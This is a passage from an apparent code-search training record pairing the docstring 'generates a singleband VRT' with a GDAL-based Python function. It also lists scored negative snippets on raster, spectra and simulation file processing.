driver\n }\n kwargs.update(**creation_options)\n\n result = rasterize(\n geometries,\n out_shape=(kwargs['height'], kwargs['width']),\n transform=kwargs.get('affine', kwargs['transform']),\n all_touched=all_touched,\n dtype=kwargs.get('dtype', None),\n default_value=default_value,\n fill=fill)\n\n if 'dtype' not in kwargs:\n kwargs['dtype'] = result.dtype\n\n kwargs['nodata'] = fill\n\n with rasterio.open(output, 'w', **kwargs) as out:\n out.write(result, indexes=1)", "def vtp(self, f_vtu, f_vtp):\r\n reader = vtk.vtkXMLUnstructuredGridReader()\r\n reader.SetFileName(f_vtu)\r\n reader.Update()\r\n ugrid = reader.GetOutput()\r\n geometryFilter = vtk.vtkGeometryFilter()\r\n geometryFilter.SetInputData(ugrid)\r\n geometryFilter.Update()\r\n polydata = geometryFilter.GetOutput()\r\n writer =vtk.vtkXMLPolyDataWriter()\r\n writer.SetFileName(f_vtp)\r\n writer.SetInputData(polydata)\r\n writer.Write()\r\n print(\"vtp file created.\")", "def func(self, name, vecs):\n arity = len(vecs)\n funcobj = self.get_ground_vector('!Func:{}:{}'.format(arity, name))\n\n argobjs = [\n associate_comp(\n self.get_ground_vector('!Arg:{}:{}:{}'.format(arity, name, i)),\n vec)\n for i, vec in enumerate(vecs) ]\n\n result = normalize_comp(\n self.func_weights @\n torch.cat([\n funcobj,\n merge(argobjs),\n merge(vecs),\n ]).reshape(-1, 2 * self.hrr_size)).reshape(2, self.hrr_size)\n\n return result", "def func(self, name, vecs):\n arity = len(vecs)\n funcobj = self.get_ground_vector('!Func:{}:{}'.format(arity, name))\n\n argobjs = [\n associate_comp(\n self.get_ground_vector('!Arg:{}:{}:{}'.format(arity, name, i)),\n vec)\n for i, vec in enumerate(vecs) ]\n\n result = normalize_comp(\n self.func_weights @\n torch.cat([\n funcobj,\n merge(argobjs),\n merge(vecs),\n ]).reshape(-1, 2 * self.hrr_size)).reshape(2, self.hrr_size)\n\n return result", "def map(self, function):\n pass" ]
[ "0.5867644", "0.5854852", "0.55360836", "0.52705306", "0.52492493", "0.52203393", "0.50498486", "0.50492585", "0.49810517", "0.49677193", "0.4958387", "0.49372962", "0.4903304", "0.4866099", "0.4855312", "0.4854982", "0.4847482", "0.48274714", "0.48194093", "0.48180053", "0.48166987", "0.48053375", "0.47922784", "0.47851402", "0.47790444", "0.4766691", "0.47532347", "0.47505015", "0.47469786", "0.4730921", "0.47222206", "0.47211903", "0.47167945", "0.47099823", "0.47059247", "0.47042257", "0.46952733", "0.46944457", "0.46904847", "0.46774563", "0.46732005", "0.46714556", "0.46680468", "0.46638173", "0.46617842", "0.46470067", "0.46463394", "0.46454737", "0.4642319", "0.46407366", "0.46318436", "0.46218064", "0.46205938", "0.4619611", "0.46186405", "0.4612022", "0.4607727", "0.45800278", "0.45761594", "0.457386", "0.45732576", "0.4561411", "0.45595834", "0.45570475", "0.45559648", "0.4553753", "0.45448166", "0.45423642", "0.45397243", "0.4535832", "0.45291469", "0.4528213", "0.45054793", "0.44969362", "0.44949448", "0.44895923", "0.44854906", "0.44788384", "0.44703394", "0.4469909", "0.44595578", "0.44576818", "0.44538018", "0.4452553", "0.4450711", "0.4447997", "0.4446187", "0.4445656", "0.44442564", "0.44420236", "0.44394374", "0.44335666", "0.4427762", "0.4427762", "0.44242752", "0.44210765", "0.44186485", "0.4418442", "0.4418442", "0.44167835" ]
0.7520964
0
Takes an inputfile (probably a VRT) and generates a singleband VRT.
def extract_color_band(inputfile, band): dataset = Dataset(inputfile) if not 1 <= band <= dataset.RasterCount: raise ValueError( "band must be between 1 and {0}".format(dataset.RasterCount) ) command = [ GDALTRANSLATE, '-q', # Quiet '-of', 'VRT', # Output to VRT '-b', band, # Single band inputfile, '/vsistdout' ] try: return VRT(check_output_gdal([str(e) for e in command])) except CalledGdalError as e: if e.error == ("ERROR 6: Read or update mode not supported on /vsistdout"): # HACK: WTF?!? return VRT(e.output) raise
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def build_vrt(vrt: str, files: List[str], resample_name: str) -> None:\n\n options = gdal.BuildVRTOptions(srcNodata=0)\n gdal.BuildVRT(destName=vrt, srcDSOrSrcDSTab=files, options=options)\n add_pixel_fn(vrt, resample_name)", "def run_vorpaline(self, input_file, *options):\n\n self._input_file = input_file\n args = list(options) + [self._input_file, 'out.meshb']\n self._run_command(\"vorpalite\", args)", "def convert_vrt(fname, out_fname, dataset_name='dataset',\n compression=H5CompressionFilter.LZF, filter_opts=None,\n attrs=None):\n with h5py.File(out_fname) as fid:\n with rasterio.open(fname) as rds:\n # set default chunks and set dimensions\n if rds.count == 3:\n chunks = (3, 256, 256)\n dims = (3, rds.height, rds.width)\n else:\n chunks = (256, 256)\n dims = (rds.height, rds.width)\n\n # create empty or copy the user supplied filter options\n if not filter_opts:\n filter_opts = dict()\n filter_opts['chunks'] = chunks\n else:\n filter_opts = filter_opts.copy()\n\n\n if 'chunks' not in filter_opts:\n filter_opts['chunks'] = chunks\n\n # modify to have 3D chunks if we have a multiband vrt\n if rds.count == 3 and len(filter_opts['chunks']) != 3:\n # copy the users original 2D chunk and insert the third\n chunks = list(filter_opts['chunks'])\n chunks.insert(0, 3)\n filter_opts['chunks'] = chunks\n\n # dataset attributes\n if attrs:\n attrs = attrs.copy()\n else:\n attrs = {}\n\n attrs['geotransform'] = rds.transform.to_gdal()\n attrs['crs_wkt'] = rds.crs.wkt\n\n # dataset creation options\n kwargs = compression.config(**filter_opts).dataset_compression_kwargs()\n kwargs['shape'] = dims\n kwargs['dtype'] = rds.dtypes[0]\n\n dataset = fid.create_dataset(dataset_name, **kwargs)\n attach_image_attributes(dataset, attrs)\n\n # tiled processing (all cols by chunked rows)\n ytile = filter_opts['chunks'][1] if rds.count == 3 else filter_opts['chunks'][0]\n tiles = generate_tiles(rds.width, rds.height, rds.width, ytile)\n\n for tile in tiles:\n # numpy index\n if rds.count == 3:\n idx = (\n slice(None),\n slice(tile[0][0], tile[0][1]),\n slice(tile[1][0], tile[1][1])\n )\n else:\n idx = (\n slice(tile[0][0], tile[0][1]),\n slice(tile[1][0], tile[1][1])\n )\n\n # ensure single band rds is read as 2D not 3D\n data = rds.read(window=tile) if rds.count == 3 else rds.read(1, window=tile)\n\n # write\n dataset[idx] = data", "def create_video(input_file, output_file):\n input_video = VideoFileClip(input_file)\n output_video = input_video.fl_image(detect_lane.fit_and_plot)\n output_video.write_videofile(output_file, audio=False)", "def readFT(self,file=\"out__1.ft\"):", "def _write_raw_brainvision(raw, bids_fname, events, overwrite):\n if not check_version(\"pybv\", PYBV_VERSION): # pragma: no cover\n raise ImportError(\n f\"pybv >= {PYBV_VERSION} is required for converting\"\n \" file to BrainVision format\"\n )\n from pybv import write_brainvision\n\n # Subtract raw.first_samp because brainvision marks events starting from\n # the first available data point and ignores the raw.first_samp\n if events is not None:\n events[:, 0] -= raw.first_samp\n events = events[:, [0, 2]] # reorder for pybv required order\n meas_date = raw.info[\"meas_date\"]\n if meas_date is not None:\n meas_date = _stamp_to_dt(meas_date)\n\n # pybv needs to know the units of the data for appropriate scaling\n # get voltage units as micro-volts and all other units \"as is\"\n unit = []\n for chs in raw.info[\"chs\"]:\n if chs[\"unit\"] == FIFF.FIFF_UNIT_V:\n unit.append(\"µV\")\n else:\n unit.append(_unit2human.get(chs[\"unit\"], \"n/a\"))\n unit = [u if u not in [\"NA\"] else \"n/a\" for u in unit]\n\n # We enforce conversion to float32 format\n # XXX: pybv can also write to int16, to do that, we need to get\n # original units of data prior to conversion, and add an optimization\n # function to pybv that maximizes the resolution parameter while\n # ensuring that int16 can represent the data in original units.\n if raw.orig_format != \"single\":\n warn(\n f'Encountered data in \"{raw.orig_format}\" format. '\n \"Converting to float32.\",\n RuntimeWarning,\n )\n\n # Writing to float32 µV with 0.1 resolution are the pybv defaults,\n # which guarantees accurate roundtrip for values >= 1e-7 µV\n fmt = \"binary_float32\"\n resolution = 1e-1\n write_brainvision(\n data=raw.get_data(),\n sfreq=raw.info[\"sfreq\"],\n ch_names=raw.ch_names,\n ref_ch_names=None,\n fname_base=op.splitext(op.basename(bids_fname))[0],\n folder_out=op.dirname(bids_fname),\n overwrite=overwrite,\n events=events,\n resolution=resolution,\n unit=unit,\n fmt=fmt,\n meas_date=None,\n )", "def simulate_UVSPEC(file, config):\n\n wavelength = config['wavelength']\n\n # Coordenates from position of the station Hannover\n latitude = 52.39 # positive in the northern hemisphere\n longitud = 9.7 # negative reckoning west from prime meridian in Greenwich,\n\n # Read name of the file (correct time)\n name = os.path.split(file)\n time_n = name[1][0:15]\n print(\"Time name\", time_n)\n # convert time to datetime format\n time = datetime.datetime.strptime(time_n,\n '%Y%m%d_%H%M%S')\n # Calculate the azimuth and zenith angles in function of the date\n elev = ps.GetAltitude(latitude, longitud, time)\n azi = ps.GetAzimuth(latitude, longitud, time)\n zenith = 90 - elev\n\n # Correction between the sign and real azimuth for plot of radiance\n if -180 <= azi < 0:\n azi = 180 - azi\n elif -360 <= azi < -180:\n azi = -azi - 180\n else:\n pass\n\n print(\"Azimuth: {:5.1f}\".format(azi),\n \"\\nZenith: {:5.1f}\".format(zenith))\n\n # Change the value of zenith and azimuth angles in function of the time and\n # position in the UVSPEC file\n\n with open(config['personal_libraries'] + 'MUDIS_HDF5/MUDIS_radiance_Input.txt', 'r') as file:\n data = file.readlines()\n\n data[14] = \"day_of_year \" + str(time.timetuple().tm_yday) + \" \" + \"\\n\"\n data[15] = \"wavelength \" + str(\"{}\".format(wavelength)) + \" \" + \\\n str(\"{}\".format(wavelength)) + \\\n \" # wavelength to calcule [nm] \\n\"\n data[17] = \"sza \" + str(\"{:2.3f}\".format(zenith)) + \\\n \" # Solar zenith angle \\n\"\n data[18] = \"phi0 \" + str(\"{:2.3f}\".format(azi)) + \\\n \" #Azimuth angle with zenith position \\n\"\n\n with open(config['personal_libraries'] + 'MUDIS_HDF5/MUDIS_radiance_Input.txt', 'w') as file:\n file.writelines(data)\n\n # Create the directory to save the results\n os.makedirs(os.path.dirname(config['str_dir'] + '/simulation/' + '{}/{}nm/txt_files/'.format(time_n[0:8],\n wavelength)),\n exist_ok=True)\n\n # Run the program UVSPEC in the terminal\n os.system(config['UVSPEC_path'] + 'uvspec < ' + config['personal_libraries'] +\n 'MUDIS_HDF5/MUDIS_radiance_Input.txt> ' + config['str_dir'] + '/simulation/' +\n '{}/{}nm/txt_files/'.format(time_n[0:8], wavelength) + time_n +\n '.txt')", "def make_big_vdwradii( targetpath ):\n\n file = open( os.path.join( targetpath, 'vdwradii.dat'), 'w')\n text=\"\"\"; Very approximate VanderWaals radii\n; only used for drawing atoms as balls or for calculating atomic overlap.\n; longest matches are used\n; '???' or '*' matches any residue name\n; 'AAA' matches any protein residue name\n; MODIFIED TO USE BIG VDW RADII TO PREVENT WATERS BEING PUT IN THE PROTEIN WHERE WE DON'T WANT THEM. DLM\n??? C 0.3\n??? F 0.3\n??? H 0.3\n??? N 0.3\n??? O 0.3\n??? P 0.3\n??? S 0.3\n??? LP1 0\n??? LP2 0\nSOL H 0.04\nSOL O 0.105\nWAT H 0.04\nWAT O 0.105\nGLY MN1 0\nGLY MN2 0\nALA MCB1 0\nALA MCB2 0 \nVAL MCG1 0 \nVAL MCG2 0 \nILE MCG1 0 \nILE MCG2 0 \nILE MCD1 0 \nILE MCD2 0 \nLEU MCD1 0 \nLEU MCD2 0 \nMET MCE1 0 \nMET MCE2 0 \nTRP MTRP1 0 \nTRP MTRP2 0\nTHR MCG1 0\nTHR MCG2 0\nLYSH MNZ1 0 \nLYSH MNZ2 0 \n\"\"\" \n file.writelines(text)\n file.close()", "def make_vrt(self):\n for index, i in enumerate(self.months):\n month = str(index + 1)\n if len(month) < 2:\n month = '0' + month\n txt_file = i.joinpath('subnational/tiffs.txt')\n outfile = i.joinpath(f'{self.country}_{month}_normalised.vrt')\n if not outfile.exists():\n gdal_cmd = f'gdalbuildvrt -input_file_list {str(txt_file)} {str(outfile)}'\n subprocess.call(gdal_cmd, shell=True)", "def copy_vrt(in_fname, out_fname=None, bbox=None, verbose=True):\n from gdal import Translate\n\n if out_fname is None:\n out_fname = in_fname + \".vrt\"\n\n # Using Translate... but would use Warp if every reprojecting\n if bbox:\n left, bottom, right, top = bbox\n projwin = (left, top, right, bottom) # unclear why Translate does UL LR\n else:\n projwin = None\n if verbose:\n logger.info(f\"Creating {out_fname}, subset bbox: {bbox}\")\n Translate(out_fname, in_fname, projWin=projwin)", "def genChirpVC(Vclamp=-70,Rm=100,amp=10,graphToo=False):\n xs,ys,zi=genSine()\n ys=ys*amp+Vclamp\n genATF(xs,ys,'stimulus-VC.atf')\n graphData(xs,ys,zi,\"Voltage Clamp Stimulus\",'stimulus-VC.png')", "def subset_multiband_vrt(src: Union[str, Path], band_request: Sequence = []):\n if not isinstance(src, (str, Path)) and not Path(src).is_file():\n raise ValueError(f\"Invalid source multiband raster.\\n\"\n f\"Got {src}\")\n with rasterio.open(src) as ras, MemoryFile() as mem:\n riocopy(ras, mem.name, driver='VRT')\n vrt_xml = mem.read().decode('utf-8')\n vrt_dataset = ET.fromstring(vrt_xml)\n vrt_dataset_dict = {int(band.get('band')): band for band in vrt_dataset.iter(\"VRTRasterBand\")}\n for band in vrt_dataset_dict.values():\n vrt_dataset.remove(band)\n\n for dest_band_idx, src_band_idx in enumerate(band_request, start=1):\n vrt_band = vrt_dataset_dict[src_band_idx]\n vrt_band.set('band', str(dest_band_idx))\n vrt_dataset.append(vrt_band)\n\n return ET.tostring(vrt_dataset).decode('UTF-8')", "def stack_singlebands_vrt(srcs: List, band: int = 1):\n vrt_bands = []\n for srcnum, src in enumerate(srcs, start=1):\n with check_rasterio_im_load(src) as ras, MemoryFile() as mem:\n riocopy(ras, mem.name, driver='VRT')\n vrt_xml = mem.read().decode('utf-8')\n vrt_dataset = ET.fromstring(vrt_xml)\n for bandnum, vrt_band in enumerate(vrt_dataset.iter('VRTRasterBand'), start=1):\n if bandnum == band:\n vrt_band.set('band', str(srcnum))\n vrt_bands.append(vrt_band)\n vrt_dataset.remove(vrt_band)\n for vrt_band in vrt_bands:\n vrt_dataset.append(vrt_band)\n\n return ET.tostring(vrt_dataset).decode('UTF-8')", "def vtt_to_srt(str_name_file: str):\n file_contents: str = read_text_file(str_name_file)\n str_data: str = \"\"\n str_data = str_data + convert_content(file_contents)\n str_name_file: str = str_name_file.replace(\".vtt\", \".srt\")\n print(str_name_file)\n file_create(str_name_file, str_data)", "def change_input(filename, frac_l=0.019994, force=25.0, time=200_000, seed=None):\r\n\r\n frac_sl = round(1.5 /(32**3 *3), 6)\r\n frac_l = round(frac_l -frac_sl, 6)\r\n frac_w = round(1 -frac_l -frac_sl, 6)\r\n \r\n params = {'Box': \"32 32 32\\t1 1 1\", 'RNGSeed': seed if seed is not None else -4073, 'Step': 0.02, 'Time': time, \r\n 'SamplePeriod': 100, 'AnalysisPeriod': 1000, 'DensityPeriod': time, 'DisplayPeriod': time //10, 'RestartPeriod': time,\r\n }\r\n\r\n with open(filename, 'rt') as rf:\r\n with open(filename+'_sim', 'wt') as wf:\r\n\r\n for line in rf:\r\n \r\n if line.startswith('Polymer\\tWater') or line.startswith('Polymer Water'):\r\n line = line.strip().split()\r\n line[2] = f\"{frac_w:.6f}\"\r\n \r\n # Converts list to list[str]\r\n line = list(map(str, line))\r\n wf.write('\\t'.join(line) + '\\n')\r\n\r\n elif line.startswith('Polymer\\tLipid') or line.startswith('Polymer Lipid'):\r\n line = line.strip().split()\r\n line[2] = f\"{frac_l:.6f}\"\r\n\r\n # Converts list to list[str]\r\n line = list(map(str, line))\r\n wf.write('\\t'.join(line) + '\\n')\r\n \r\n elif line.startswith('Polymer\\tSingleLipid') or line.startswith('Polymer SingleLipid'):\r\n line = line.strip().split()\r\n line[2] = f\"{frac_sl:.6f}\"\r\n\r\n # Converts list to list[str]\r\n line = list(map(str, line))\r\n wf.write('\\t'.join(line) + '\\n')\r\n\r\n elif line.startswith('Command\\tConstantForceOnTarget') or line.startswith('Command ConstantForceOnTarget'):\r\n line = line.strip().split()\r\n\r\n if line[3] == \"singleLipidHead\":\r\n line[-1] = f\"{force /3:.6f}\" \r\n\r\n elif line[3] == \"lowerHeads\":\r\n line[-1] = f\"{force /3 /(1636):.6f}\"\r\n\r\n # Converts list to list[str]\r\n line = list(map(str, line))\r\n wf.write('\\t'.join(line) + '\\n')\r\n \r\n # if line.startswith('\tTimes\t0 1000'):\r\n # line = line.strip().split()\r\n # line[2] = f\"{time}\"\r\n \r\n # # Converts list to list[str]\r\n # line = list(map(str, line))\r\n # wf.write('\\t'.join(line) + '\\n') \r\n # line = next(rf) \r\n \r\n # if line.strip().split() and line.strip().split()[0] in params.keys():\r\n # key = line.strip().split()[0]\r\n # wf.write(f\"{key:<12}\\t{str(params[key])}\\n\")\r\n\r\n else:\r\n wf.write(line)", "def __init__(self, filename):\r\n self.__output__ = open(format(filename, '08X') + '.gen', 'wb')", "def write_input_file(y,z,fname):\n file = open('c:/4nec2/out/' + fname + '.nec', 'w')\n file.write('CM Seeddesign \\n')\n file.write('CM Zigzag Antenna \\n')\n file.write('CE File generated by python \\n')\n seg = 1\n\n #write the antenna\n for i in range(0,len(y)-1):\n file.write('GW %3i %3i %8.4f %8.4f %8.4f %8.4f %8.4f %8.4f %8.4f\\n' % (1,seg,0,y[i],z[i],0,y[i+1],z[i+1],1))\n\n file.write('GE 0 \\n')\n file.write('EK \\n')\n file.write('EX %3i %3i %3i %3i %3i %3i %3i\\n' % (0,1,1,1,1,0,0))\n file.write('GN -1 \\n')\n \n file.write('FR %3i %3i %3i %3i %8.4f %8.4f\\n' % (0,1,0,0,900,0))\n file.write('FR %3i %3i %3i %3i %8.4f %8.4f\\n' % (0,11,0,0,850,10))\n\n file.write('LD %3i %3i %3i %3i %8.4f %8.4f\\n' % (5,1,0,0,58000000,2))\n file.write('RP %3i %3i %3i %3i %8.4f %8.4f %8.4f %8.4f\\n' % (0,1,1,1000,90,0,0,0))\n\n file.write('EN \\n')\n file.close()", "def get_rad_file(self, input_file, out_dir, overwrite_rad):\n # name of the rad file - replace psv with rad (or PSV with RAD)\n self.rad_file = self.get_rad_filename(input_file)\n\n if \"rad\" in self.rad_file.lower() and self.rad_file.lower().endswith(\".tab\"):\n if self.rad_file == input_file:\n return True\n if os.path.isfile(self.rad_file) and not overwrite_rad:\n # valid rad file already exists, just return\n return True\n\n # input is psv and rad file does not yet exist - let's create it first.\n # create rad file and change path to where it will end up in out_dir\n if out_dir is not None:\n (path, filename) = os.path.split(self.rad_file)\n self.rad_file = os.path.join(out_dir, filename)\n else:\n (out_dir, filename) = os.path.split(input_file)\n radiance_cal = RadianceCalibration(self.logfile, self.main_app)\n return radiance_cal.calibrate_to_radiance(InputType.FILE, input_file, out_dir, overwrite_rad)", "def which_band_is_file(filename):\n if not is_galex_file(filename):\n return None\n return \"fuv\" if \"-fd-\" in filename else \"nuv\" if \"-nd-\" in filename \\\n else \"unknown\"", "def outputSingleFrame(self, frame=None):\n if frame is None:\n frame = 1\n\n self.loadFringe(frame=frame)\n\n outputName = self.inputFilenames['ofd'][:-4] + '_single_f' + str(frame) + '.ofd'\n\n with open(outputName, 'wb') as f:\n self.rawBScan.astype('uint16').tofile(f)", "def merge(files: List[str], output_file: str, resample: str = \"average\") -> None:\n\n build_vrt(constants.TEMP_VRT_FILE, files, resample)\n\n gdal.SetConfigOption('GDAL_VRT_ENABLE_PYTHON', 'YES')\n\n gdal.Translate(destName=output_file, srcDS=constants.TEMP_VRT_FILE)\n\n gdal.SetConfigOption('GDAL_VRT_ENABLE_PYTHON', None)\n\n if os.path.isfile(constants.TEMP_VRT_FILE):\n os.remove(constants.TEMP_VRT_FILE)", "def buildvrt(indir, outdir):\n indir = Path(indir)\n outdir = Path(outdir)\n\n # loop over each day directory\n for day in indir.iterdir():\n # expecting 20 subdatasets in each hdf4 file (hopefully the order gdal lists them in is consistent)\n subdataset_fnames = {i: [] for i in range(20)}\n\n # mosaic each MODIS tile for the current day directory\n for h4_fname in day.rglob('*.hdf'):\n with rasterio.open(str(h4_fname.absolute())) as h4_ds:\n\n # each subdataset will form a separate mosaic\n for i, sds_name in enumerate(h4_ds.subdatasets):\n subdataset_fnames[i].append(sds_name)\n\n # loop over each subdataset and mosaic from all supporting MODIS tiles\n for _, file_list in subdataset_fnames.items():\n\n # temp file for the input file list\n with tempfile.NamedTemporaryFile('w') as tmpf:\n tmpf.writelines(\"\\n\".join(file_list))\n tmpf.flush()\n\n # mimic the 'day' directory partition\n base_name = Path(file_list[0].replace(':', '/')).name\n out_fname = outdir.joinpath(day.name, '{}.vrt'.format(base_name))\n\n if not out_fname.parent.exists():\n out_fname.parent.mkdir(parents=True)\n\n # buildvrt\n cmd = [\n 'gdalbuildvrt',\n '-input_file_list',\n tmpf.name,\n str(out_fname)\n ]\n\n check_call(cmd)", "def nirspec_spectrum1d_reader(file_name):\n\n hdulist = fits.open(file_name)\n\n # make wavelength a seperate component in addition to coordinate\n # so you can plot it on the x axis\n wavelength = np.linspace(hdulist['DATA'].header['CRVAL1'],\n hdulist['DATA'].header['CRVAL1']*hdulist['DATA'].header['CDELT1'],\n hdulist['DATA'].header['NAXIS1'])[::-1]\n\n data = Data(label='1D Spectrum')\n data.header = hdulist['DATA'].header\n data.add_component(wavelength, 'Wavelength')\n data.add_component(hdulist['DATA'].data, 'Flux')\n data.add_component(np.sqrt(hdulist['VAR'].data), 'Uncertainty')\n\n return data", "def make_spectra(directory,frame):\n oober = st.short_oober(directory, frame=frame)\n #st.MakeVelocitySpectra(oober,frame)\n #st.MakeAccelSpectra(oober,frame)\n #st.MakeMagneticSpectra(oober,frame)\n st.MakeDensitySpectra(oober,frame)", "def open_raw(path):\r\n raw_file_reader = RawFileReader.RawFileReaderAdapter.FileFactory(path)\r\n raw_file_reader.SelectInstrument(Business.Device.UV, 1)\r\n return raw_file_reader", "def make_spec(fi, bw, n, rms, v0, transitions, bandpass, baseline, order,\n Te, ne, Tr, W, dD, EM, cont, Tc, nu, plot, plot_out,\n n_max=1500, verbose=False):\n \n ff = fi + bw\n df = bw/n\n \n # Make the arrays to store the spectrum\n freq = np.arange(fi, ff, df)\n tau = np.zeros(n)\n \n # Create Gaussian noise and add it to the spectrum.\n noise = synth.make_noise(0, rms, n)\n tau_n = tau + noise\n \n # Create a baseline that mimics a standing wave \n # and add it to the spectrum.\n # This values produce a nice variation.\n if bandpass:\n tau_n += synth.make_ripples(4*n, n/2., n, rms)\n \n if baseline:\n tau_n += synth.make_offset(rms, freq, order=order)\n \n z = v0/3e5\n print \"Will use a redshift of: {0}\".format(z)\n print \"Subband edges: {0}--{1}\".format(fi, ff)\n \n for i,trans in enumerate(transitions.split(',')):\n if trans != '':\n n_l, f_l = crrls.find_lines_sb(freq, trans, z, verbose)\n \n # Generate the line properties as a function of n\n dL_r = crrls.radiation_broad_salgado(n_l, W, Tr)/1e6\n dL_p = crrls.pressure_broad_salgado(n_l, Te, ne)/1e6\n dL = dL_r + dL_p\n \n if Tr != 0:\n other = 'case_diffuse_{0}'.format(rrlmod.val2str(Tr))\n else:\n other = ''\n \n n_itau, a_itau = rrlmod.itau(rrlmod.val2str(Te), \n ne, \n trans, n_max=n_max, \n other=other,\n verbose=True)\n \n dD_f = crrls.dv2df(f_l, dD*1e3)\n \n for j,f in enumerate(f_l):\n itau = a_itau[np.where(n_itau==n_l[j])[0]][0]/1e6\n line = crrls.voigt(freq, dD_f[j]/2., dL[j]/2., f, itau*EM)\n if verbose:\n print \"Line properties:\"\n print(\"f: {0}, A: {1}, dD: {2}, dD_f/2: {3}, \" \\\n \"dL/2: {4}\".format(f, itau*EM, dD, dD_f[j]/2., dL[j]/2.))\n tau_n += line\n \n if cont:\n tau_n = (1 + tau_n)*power_law(freq, Tc, nu)\n \n if plot:\n fig = plt.figure(frameon=False)\n ax = fig.add_subplot(1, 1, 1)\n ax.plot(freq, tau_n, 'k-', label='generated spectrum')\n ax.plot(freq, power_law(freq, Tc, nu), 'r-', label='continuum')\n plt.legend(loc=0, numpoints=1, frameon=False)\n plt.savefig('{0}'.format(plot_out), \n bbox_inches='tight', pad_inches=0.3)\n plt.close()\n \n \n #np.savetxt(spec, np.c_[freq, tau_n])\n \n return freq, tau_n", "def get_rad_filename(input_file):\n # replace PSV with RAD\n (path, filename) = os.path.split(input_file)\n rad_filename = filename.replace('psv', 'rad')\n rad_filename = rad_filename.replace('PSV', 'RAD')\n rad_file = os.path.join(path, rad_filename)\n\n # rename to .TAB from .TXT in case of raw input\n rad_file = rad_file.replace('.TXT', '.tab')\n rad_file = rad_file.replace('.txt', '.tab')\n\n return rad_file", "def test_simple_single_file():\n\n out_data = run_tvnamer(\n with_files = ['S01E02 - Some File.avi'],\n with_flags = [\"--batch\"])\n\n expected_files = ['S01E02 - Some File.avi']\n\n verify_out_data(out_data, expected_files, expected_returncode = 2)", "def convert_vtt_to_str(file):\n if \".vtt\" in file:\n vtt_to_srt(file)", "def test_RV():\n\n spec = IGRINSSpectrum(file=file)\n\n assert spec.uncertainty is not None\n assert hasattr(spec, \"barycentric_correct\")\n\n correction_velocity = spec.estimate_barycorr()\n\n assert isinstance(spec.RA, astropy.units.quantity.Quantity)\n assert isinstance(spec.DEC, astropy.units.quantity.Quantity)\n assert correction_velocity is not None\n assert isinstance(correction_velocity, astropy.units.quantity.Quantity)\n\n new_spec = spec.barycentric_correct()\n assert new_spec is not None\n assert isinstance(new_spec, Spectrum1D)", "def create_training_file(D_RAT):\r\n return create_arff_file(D_RAT, 0)", "def createInput(dirPath,gSettings):\n \n with open(os.path.join('../in','input.txt')) as f:\n inpFile = f.readlines()\n \n\n # Model settings\n model = gSettings[\"Model\"]\n inpFile[13] = \"insgrav: {:1d}\\n\".format(int(model[\"NS gravity\"][\"Flag\"]))\n inpFile[14] = \"isun: {:1d}\\n\".format(int(model[\"Lunisolar\"][\"Sun\"]))\n inpFile[15] = \"imoon: {:1d}\\n\".format(int(model[\"Lunisolar\"][\"Moon\"]))\n\n if model[\"Drag\"][\"Flag\"] == False:\n inpFile[16] = \"idrag: 0\\n\"\n else:\n dm = model[\"Drag\"][\"Model\"].lower()\n if dm == \"wertz\":\n idrag = 1\n elif dm == \"us76\":\n idrag = 2\n elif dm == \"j77\":\n idrag = 3\n elif dm == \"msis00\":\n idrag = 4\n else:\n raise ValueError('Value \"' + model[\"Drag\"][\"Model\"] + '\" invalid.')\n inpFile[16] = \"idrag: {:1d}\\n\".format(idrag)\n if model[\"Drag\"][\"Solar flux\"].lower() == \"constant\":\n inpFile[17] = \"iF107: 0\\n\"\n elif model[\"Drag\"][\"Solar flux\"].lower() == \"variable\":\n inpFile[17] = \"iF107: 1\\n\"\n else:\n raise ValueError('Value \"' + model[\"Drag\"][\"Solar flux\"] + '\" invalid.')\n\n if model[\"SRP\"][\"Flag\"] == False:\n inpFile[18] = \"iSRP: {:1d}\\n\".format(int(model[\"SRP\"][\"Flag\"]))\n else:\n inpFile[18] = \"iSRP: {:1d}\\n\".format(int(model[\"SRP\"][\"Flag\"]))\n if model[\"SRP\"][\"Eclipses\"]:\n inpFile[18] = \"iSRP: 2\\n\"\n \n if model[\"Lunisolar\"][\"Ephemerides\"] == \"DE431\":\n inpFile[19] = \"iephem: 1\\n\"\n elif model[\"Lunisolar\"][\"Ephemerides\"] == \"Meeus\":\n inpFile[19] = \"iephem: 2\\n\"\n else:\n raise ValueError('Value \"' + model[\"Lunisolar\"][\"Ephemerides\"] + '\" invalid.')\n \n inpFile[20] = \"gdeg: {:3d}\\n\".format(model[\"NS gravity\"][\"Degree\"])\n if model[\"NS gravity\"][\"Order\"] <= model[\"NS gravity\"][\"Degree\"]:\n inpFile[21] = \"gord: {:3d}\\n\".format(model[\"NS gravity\"][\"Order\"])\n else:\n raise ValueError(\"Order {0:d} of the gravity field is greater than degree {1:d}\".format(model[\"NS gravity\"][\"Order\"],model[\"NS gravity\"][\"Degree\"]))\n \n\n\n # Integration settings\n integ = gSettings[\"Integration\"]\n inpFile[29] = \"tol: {:22.15E}\\n\".format(integ[\"Tolerance\"])\n inpFile[30] = \"tspan: {:22.15E}\\n\".format(integ[\"Duration\"] * 365.25)\n inpFile[31] = \"tstep: {:22.15E}\\n\".format(integ[\"Step\"])\n inpFile[39] = \"eqs: {:2d}\\n\".format(integ[\"Equations\"])\n\n\n\n # Output settings\n inpFile[44] = \"verb: 0\\n\"\n inpFile[45] = \"out: \" + os.path.abspath(os.path.join(dirPath, ' '))\n\n\n with open(os.path.join(dirPath,'input.txt'),'w') as f:\n f.writelines(inpFile)", "def get_san(infp, outfp):\n\n return ...", "def deimos_spectrum1D_reader(file_name):\n\n hdulist = fits.open(file_name)\n data = Data(label='1D Spectrum')\n data.header = hdulist[1].header\n\n full_wl = np.append(hdulist[1].data['LAMBDA'][0], hdulist[2].data['LAMBDA'][0])\n full_spec = np.append(hdulist[1].data['SPEC'][0], hdulist[2].data['SPEC'][0])\n full_ivar = np.append(hdulist[1].data['IVAR'][0], hdulist[2].data['IVAR'][0])\n\n data.add_component(full_wl, 'Wavelength')\n data.add_component(full_spec, 'Flux')\n data.add_component(1/np.sqrt(full_ivar), 'Uncertainty')\n\n return data", "def process_rom_file(name):\n\n # Link the instruction rom file to the tb directory\n SRC_FILE = REPO_ROOT + '/tests/riscv-tests-simple/generated/' + name + \".verilog\"\n ROM_FILE = os.getcwd() + '/verilog.rom' # need to link the instruction ram file the the current directory\n if os.path.isfile(ROM_FILE):\n os.remove(ROM_FILE)\n os.symlink(SRC_FILE, ROM_FILE)\n\n FP = open('verilog.rom', \"r\")\n IRAM_FP = open('instr_ram.rom', \"w\")\n DRAM_FP = open('data_ram.rom', 